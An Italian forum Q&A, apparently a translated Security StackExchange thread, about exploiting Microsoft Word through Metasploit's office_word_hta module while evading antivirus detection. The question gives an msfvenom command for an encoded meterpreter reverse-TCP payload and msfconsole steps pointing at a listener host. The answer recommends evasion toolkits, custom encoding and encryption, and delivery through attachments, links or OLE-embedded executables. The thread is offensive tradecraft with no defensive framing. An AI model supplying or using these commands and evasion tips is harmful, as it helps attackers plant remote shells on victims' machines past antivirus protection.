Utilizzo di office_word_hta

-1

Sto cercando di sfruttare MS Word, evitando il rilevamento AV. Quindi, cosa devo fare?

In primo luogo, generando il payload, ad esempio:

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe

1. Quale file dovrebbe essere? EXE? Se imposto "-f exe", devo ancora impostare il nome "payload.exe" di "payload"?

2. Come scegliere quali codificatori utilizzare e quali iterazioni evitare i rilevamenti di AV Kaspersky per esempio? Provare da uno all'altro o cosa?

Quindi vado su msfconsole

msf > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit

Sto facendo bene?)

    
posta bumblebee 14.09.2017 - 10:24
fonte

1 risposta

0

encoding

Alcune cose che potresti fare è cambiare il codificatore per il carico utile - shikata_ga_nai è un metodo di codifica ben noto che diversi AV possono rilevare.

Innanzitutto, genera lo shellcode non codificato grezzo.

Da lì, usa un altro toolkit (Veil 3.0 / Veil-Evasion, empty-nest, Ebowla) che ha un gran numero di opzioni di codifica.

Puoi anche utilizzare codificatori basati sul contesto, che si basano su informazioni conosciute (ad es. il dominio, nome utente del contesto corrente, creatività): link link

Un altro modo economico per codificare è crittografare "AAAA" con RC4 o un altro algoritmo crittografico (sha-256) diverse volte e fare in modo che lo shellcode esegua la stessa operazione e lo esegua con la forza bruta (utilizzandolo come chiave) per decodificare il payload progressivo:

link link

link

CARICO UTILE

Fai la tua ricerca! potresti servire il file come allegato o inviare un link benigno / errato e avere il target estrarre il file dal tuo server (crittografato con un certificato SSL valido via letencrypt o msf \ impersonate_ssl).

Ci sono alcuni bypass là fuori, uno è che puoi incorporare un eseguibile in un documento di Microsoft Office a causa di OLE: link

Al di fuori di questo, devi davvero conoscere il tuo obiettivo e provare più difficile!

    
risposta data 06.10.2017 - 19:37
fonte

Leggi altre domande sui tag